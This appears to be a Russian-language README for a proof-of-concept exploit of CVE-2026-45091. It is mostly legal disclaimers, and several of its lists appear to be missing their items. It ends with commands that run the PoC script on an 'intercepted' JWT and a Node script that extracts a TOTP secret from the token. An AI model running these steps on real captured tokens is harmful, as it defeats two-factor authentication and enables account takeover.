
CVE-2026-45091
Этот репозиторий предоставлен строго только для образовательных, академических и авторизованных исследований в области кибербезопасности.
Он предназначен для понимания:
Данный репозиторий должен использоваться только в средах, где получено явное разрешение, например:
Любое использование за пределами авторизованных сред строго запрещено.
Автор и участники этого репозитория не несут ответственности, не обязаны по закону и не подотчётны за любое неправомерное использование, ущерб, потери или юридические последствия, возникающие в результате использования, неправомерного использования или распространения этого проекта или его содержимого.
Используя данный репозиторий, вы подтверждаете, что:
Автор прямо отказывается от какой-либо ответственности за незаконное, вредоносное или неавторизованное использование этого репозитория или его содержимого.
Любое такое использование:
Этот проект предназначен исключительно для:
Он следует принципам ответственного раскрытия информации и этичных исследований в области безопасности.
Исследования в области безопасности всегда должны проводиться:
Для ответственного раскрытия информации или исследовательского сотрудничества свяжитесь с сопровождающим репозитория через GitHub.
chmod +x poc-cve-2026-45091.sh
# Запуск с перехваченным токеном
./poc-cve-2026-45091.sh "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0b3RwU2VjcmV0IjoiSldJU0hJVEUyM0FCTEMyM0RFRkciLCJleHAiOjE3MTAwMDAwMDB9.signature"
const token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0b3RwU2VjcmV0IjoiSldJU0hJVEUyM0FCTEMyM0RFRkci...";
node extract-totp.js